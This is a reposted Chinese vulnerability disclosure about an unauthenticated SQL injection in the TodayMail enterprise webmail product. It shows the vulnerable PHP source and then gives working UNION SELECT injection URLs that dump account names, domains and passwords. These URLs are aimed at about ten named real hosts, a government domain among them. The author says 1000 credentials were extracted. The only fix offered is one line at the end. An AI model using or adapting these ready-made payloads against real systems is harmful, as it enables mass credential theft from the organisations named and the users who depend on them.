IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
    • 登录 注册

    TodayMail某处无需登陆的SQL注入可轻松导致大量企业邮箱帐号被脱裤

    没穿底裤发表于 2015-10-09 12:31:02
    love 0

    漏洞作者: xfkxfk

    详细说明:

    TodayMail,时代企业邮,简介如下:

    http://www.now.cn/email/overview.net

    搜索关键字:时代企业邮

    案例很多,就不截图了

    文件searchAddr.inc.php

    <?

header('Content-Type:text/xml;charset=UTF-8');

include_once "../config/dbremote.inc.php";

include_once "../../core/emailcore.class.inc.php";



$value=trim($_REQUEST['value']);

$tm_id=trim($_REQUEST['ftm_id']);

$EmailCore = new EmailCore($tm_id);

$addrList=$EmailCore->searchAddrAllByKeyword($value);

$str="<?xml version=\"1.0\" encoding=\"UTF-8\"?><properties><property>";

$str.="<num>".count($addrList)."</num>";

for($i=0;$i<count($addrList);$i++){

        $str.="<name".$i.">".$addrList[$i]['name']."</name".$i.">";

        $str.="<email".$i.">".$addrList[$i]['email']."</email".$i.">";

}

$str.="</property></properties>";

echo $str;

?>

     

    第一:

    可以看到这里没有包含登录验证的文件,所以可以无需登录即可直接访问

    然后$value=trim($_REQUEST[‘value’]);

    接着$addrList=$EmailCore->searchAddrAllByKeyword($value);

    跟进函数searchAddrAllByKeyword,文件emailcore.class.inc.php

    function searchAddrAllByKeyword($value){

                //global $db_remote;

                $addrArray=array();

                $sql="select name,email from address  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";

                $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());

                while($array=mysql_fetch_assoc($rs)){

                        $addrArray[]=$array;

                }

                $sql="select tm_name as name,tm_domain as email from todaymail  where tm_domain='".$this->EmailInfo['tm_domain']."' and (tm_name like '%$value%' or tm_domain like '%$value%') and tm_status in (1,3) and tm_level <> '1' order by tm_name asc";

//              echo $sql;

                $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());

                while($array=mysql_fetch_assoc($rs)){

                        $array['email']=$array['name']."@".$array['email'];

                        $addrArray[]=$array;

                }

                $sql="select name,email from mailcard  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";

                $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());

                while($array=mysql_fetch_assoc($rs)){

                        $addrArray[]=$array;

                }

                return $addrArray;

        }

     

    清楚的看到变量$value直接进入select sql语句了,没有进行任何过滤处理,导致SQL注入漏洞产生。。。

    这里是没有登录的直接拿到数据

    可惜的是没有拿到服务器权限,而且通过域名看到,这里存在大量的企业。

    以官网为例吧:

    http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,%27@@@%27,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&amp;ftm_id=103361

    通过这里的tm_domain域名字段,可以看到存在4000个域名

    07170209cb3f3682407b6122279a14d7fe295188[1]

    去重也存在3000多个域名,意味着有3000多个企业咯

    漏洞证明:

    以官网为例吧:

    http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&amp;ftm_id=103361

    这里读取了1000个用户的用户名,域名,密码

    07170225503b5007ecff198306ba969ade520f96[1]

    再随便给几个例子:

    http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 
http://mail.wfq.gov.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://streamline.com.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mail.inkbank.com.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mail.zhangjiang.net/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mail.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx601.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx605.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx606.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx621.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

     

    而且数据库很多,邮件内容等都会泄漏的。

    用户量很大,应该是高危漏洞,很多企业的邮箱系统基本上都会沦陷。

    修复方案:

    包含登录验证文件,过滤



沪ICP备19023445号-2号
友情链接